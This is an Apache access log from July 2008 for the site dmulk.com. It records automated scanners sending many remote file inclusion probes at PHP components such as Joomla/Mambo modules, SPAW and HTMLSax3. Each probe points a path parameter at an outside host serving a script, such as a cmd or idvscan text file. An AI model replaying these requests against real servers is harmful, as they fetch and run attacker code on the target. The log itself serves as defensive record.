66.244.233.121 - - [13/Jul/2008:12:44:34 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:12:44:40 -0700] "GET /bikes/dteel/2008_02_15/?D=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:44:46 -0700] "GET /logs/access_080315.log/index.php?do=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:44:48 -0700] "GET /logs/index.php?do=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:44:52 -0700] "GET /index.php?do=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 200 18403 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [13/Jul/2008:12:45:19 -0700] "GET /logs//start.php?s=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [13/Jul/2008:12:45:20 -0700] "GET //start.php?s=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:23 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:23 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:23 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:24 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:24 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:24 -0700] "GET /logs/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:32 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:32 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:32 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:12:45:35 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
68.142.212.191 - - [13/Jul/2008:12:45:35 -0700] "GET /blog/wp-content/uploads/picture-015-800x600.jpg HTTP/1.0" 200 160195 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:38 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:38 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:45:39 -0700] "GET /logs/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:45:39 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:45:39 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:45:39 -0700] "GET /logs/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:45:46 -0700] "GET /logs/access_080322.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:45:47 -0700] "GET /logs/access_080322.log/index.php?canal=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:45:47 -0700] "GET /logs/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:45:47 -0700] "GET /logs/index.php?canal=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:12:45:52 -0700] "GET /logs//start.php?s=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:12:45:53 -0700] "GET //start.php?s=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:45:53 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:45:53 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:46:10 -0700] "GET /logs/access_080214.log/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:46:10 -0700] "GET /logs/access_080214.log/index.php?canal=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.8 - - [13/Jul/2008:12:46:25 -0700] "GET /logs/access.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [13/Jul/2008:12:46:26 -0700] "GET /index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [13/Jul/2008:12:46:26 -0700] "GET /logs/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:46:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:46:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:12:46:52 -0700] "GET /logs/access.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:12:46:52 -0700] "GET /index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:12:46:53 -0700] "GET /logs/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:12:47:42 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:12:47:44 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:12:47:44 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:12:48:27 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:12:48:28 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:48:45 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:48:58 -0700] "GET /logs/access_080425.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:49:02 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18515 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:49:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [13/Jul/2008:12:49:54 -0700] "GET /errors.php?error=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:49:55 -0700] "GET /logs/access_080313.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:49:55 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:49:56 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:49:59 -0700] "GET /logs/access_080313.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:50:04 -0700] "GET /logs/access_080326.log//start.php?s=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:50:07 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:50:10 -0700] "GET /logs/access_080425.log/errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:50:13 -0700] "GET /logs/access_080313.log/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [13/Jul/2008:12:50:19 -0700] "GET /logs/access_080207.log/errors.php?error=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:12:50:33 -0700] "GET /logs/access_080103.log//admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:12:50:39 -0700] "GET /logs/access_080329.log//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:12:50:39 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:12:50:39 -0700] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:12:50:54 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:50:56 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.8 - - [13/Jul/2008:12:50:59 -0700] "GET /logs/access_080225.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:12:51:16 -0700] "GET /logs/access.log/HTMLSax3.php?dir[plugins]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:12:51:16 -0700] "GET /HTMLSax3.php?dir[plugins]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.223.69 - - [13/Jul/2008:12:51:16 -0700] "GET /logs/HTMLSax3.php?dir[plugins]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:12:51:37 -0700] "GET /logs/access_080225.log/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:51:41 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:51:43 -0700] "GET /index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 18397 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:51:48 -0700] "GET /logs/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:51:49 -0700] "GET /errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:52:11 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:52:14 -0700] "GET /index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:52:15 -0700] "GET /logs/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:52:22 -0700] "GET /logs/errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:52:22 -0700] "GET /errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:52:47 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:52:48 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:53:06 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:53:07 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:12:53:29 -0700] "GET /logs/access.log/HTMLSax3.php?dir[plugins]=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:12:53:29 -0700] "GET /HTMLSax3.php?dir[plugins]=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.29.34 - - [13/Jul/2008:12:53:30 -0700] "GET /logs/HTMLSax3.php?dir[plugins]=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:53:30 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [13/Jul/2008:12:53:31 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:53:38 -0700] "GET /index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:53:47 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:53:55 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:53:59 -0700] "GET /index.php?sourcedir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 200 18439 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:54:20 -0700] "GET /logs//start.php?s=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:12:54:20 -0700] "GET //start.php?s=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:54:37 -0700] "GET /logs/?sourcedir=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 55993 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:54:40 -0700] "GET /?sourcedir=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:55:33 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:55:33 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:55:33 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:56:02 -0700] "GET /logs//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:56:02 -0700] "GET /logs//start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:56:02 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:56:02 -0700] "GET //start.php?s=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:56:07 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:56:25 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:56:45 -0700] "GET /logs/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:12:56:47 -0700] "GET /logs/access_080118.log/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:56:48 -0700] "GET /index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:56:49 -0700] "GET /logs/index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.111.80.230 - - [13/Jul/2008:12:56:52 -0700] "GET /index.php?sourcedir=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:12:57:23 -0700] "GET /logs/access.log/HTMLSax3.php?dir[plugins]=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:12:57:23 -0700] "GET /HTMLSax3.php?dir[plugins]=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:12:57:24 -0700] "GET /logs/HTMLSax3.php?dir[plugins]=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:57:57 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:12:57:58 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:58:31 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.105.165 - - [13/Jul/2008:12:58:31 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:58:36 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:58:37 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:58:37 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:58:57 -0700] "GET /logs/errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.255.236.6 - - [13/Jul/2008:12:58:58 -0700] "GET /errors.php?error=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
